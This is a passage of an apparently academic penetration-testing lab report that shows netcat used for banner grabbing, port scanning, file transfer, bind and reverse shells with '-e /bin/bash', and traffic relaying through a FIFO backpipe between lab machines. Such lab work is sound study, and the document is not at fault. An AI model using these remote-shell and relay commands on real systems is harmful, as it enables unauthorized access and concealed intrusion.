Netcat is a networking utility which reads and writes data across network connections, using the TCP/IP protocol. The command ‘echo “” | nc -v -n -w1 131.168.10.15 53 can be used to perform a banner grab to identify a TCP service. In this example, the ‘-v’ flag puts netcat in ‘verbose’ mode, the ‘-n’ flag tells netcat not to perform DNS lookup on the IP address, and the ‘-w1’ flag tells netcat to wait no more than 1 second for a connection to occur. In the example in figure 67, netcat could not identify the version information with this method, although various ports and machines were attempted.
Figure 132. Using netcat to perform a banner grab
In the example in figure 68 netcat performs a scan on port 135 of target 131.168.10.15.
Figure 133. Using netcat to perform a portscan
A banner grab was performed on the www.sunbikes.com website with a HEAD request. As this is considered public information no law was broken. The output in figure 69 shows that the server is
“Nginx /Varnish“ which is a web server / web proxy server.
74
Figure 134. Banner grab performed on www.sunbikes.com
A secondary banner grab is performed on 131.168.10.15 on port 80 with a HEAD request. Here it is seen that the server is running Microsoft-IIS/7.5 (figure 70).
Figure 135. Banner grab on 131.168.10.15 target
Finally, a GET request is issued on 131.168.10.15, providing similar information to the HEAD request, except now the language used to write the webpage (html) can be seen (figure 71).
75
Figure 136. GET request on 131.168.10.15
In the next task, the Linux Mint virtual machine is set up to listen on port 7777 via the ‘nc –l –p 7777 command’. Then, the second machine (backtrack) connects to port 7777 on the Linux Mint machine via the ‘nc –v 131.168.10.11 7777’ command. Once the connection is establish, text is sent over the port.
Figure 137. Using netcat to send text
Netcat can also be used to send files between computers. First, a file to transfer was created (figure 73) and then port 7777 was opened on the Linux Mint machine and instructed to send the transfer.txt file in the connection once it is establish with the ‘nc –l –p 7777 < transfer.txt’ command (figure 74).
Figure 138. A file to transfer in created
76
Figure 140. The file is received and saved.
Another feature of netcat that is useful for exploitation purposes is to open up a terminal with the flag -e /bin/bash’. First th-e Linux Mint virtual machin-e is s-et to list-en on port 7777, and onc-e a host is connected it will bind /bin/bash to the session (figure 76).
Figure 141. Setting up a port to issue a terminal to any incoming connections
Next, the connecting machine (backtrack) was instructed to connect to port 7777 on 131.168.10.11.
However, now it has a terminal session bound to the connection. This is demonstrated by issuing the ‘ls’
command to view the current directory on the Linux Mint machine (figure 77).
Figure 142. The attack platform connects to the target and is assigned an active terminal session
Additionally, a reverse shell can also be created. In this scenario, the sender, not the receiver, is the one binding the terminal to the session. This is useful in situations when a host may be behind NAT, and could not be connected to because it has a private IP address. Therefore, the host with the private IP address connects and sends the /bin/bash command to the host with the public IP address. To
77 demonstrate this, the Linux Mint machine once again listens on port 7777 (figure 78), however it does not issue the –e /bin/bash command. Instead, this command is issued on the connecting
machine(backtrack) (figure 79). As a result, the ‘ls’ command can be issued on the Linux Mint machine in order to see the current directory on the connecting machine (backtrack) (figure 80).
Figure 143. Netcat is instructed to open port 7777 and listen
Figure 144. Netcat instructs to connect to target device and port and assign a terminal session
Figure 145. The listening computer now has an active terminal session on the connecting computer
Next, port redirection is set up from the backtrack machine to the Linux Mint box, and finally to the Windows Server 2008 patched box. To accomplish this, the Linux Mint box has the command ‘nc –l –p 7777 | nc 131.168.10.15’ executed, meaning it listens on port 7777 and any incoming data is sent (piped) to 131.168.10.15 on port 80. The Backtrack box then connects to the Linux Mint machine on port 7777 as normal, then issues a HEAD request (figure 82). As a result, it sends any information received on port 7777 to the Windows 2008 Server. The wireshark output below proves this with the source and destination IP’s, and a hex dump of the HEAD request (figure 83).
Figure 146. Incoming data on port 7777 is sent to port 80 on 131.168.10.15
78
Figure 148. Network traffic of the data transfer redirect as captured by Wireshark
However, the problem is that once the output is returned to the Linux Mint machine, it is then lost. To resolve this problem, a special FIFO file called ‘backpipe’ is created. Next, two files are created that log what is sent to the Linux Mint machine, and what is sent back to the Backtrack machine. These files are called ‘inflow’ and ‘outflow’ respectively, and is pushed to ‘backpipe’. Finally, because the first
command is listening to ‘backpipe’, the output is sent back to the Backtrack machine. This was
accomplished by executing the ‘ nc -l -p 7777 0<backpipe | tee -a inflow | nc 131.168.10.15 80 | tee -a outflow 1>backpipe’ command (figure 84 and 85). The Wireshark output shows the Linux Mint machine sending the Backtrack machine the HEAD request (note the protocol used to send it was TCP, not HTTP) (figure 86).
Figure 149. Using 'backpipe' to relay information back to the original device
Figure 150. The connecting device now receives data sent from 131.168.10.15 through 131.168.10.11
79
Figure 151. Network traffic showing data redirection, as captured by Wireshark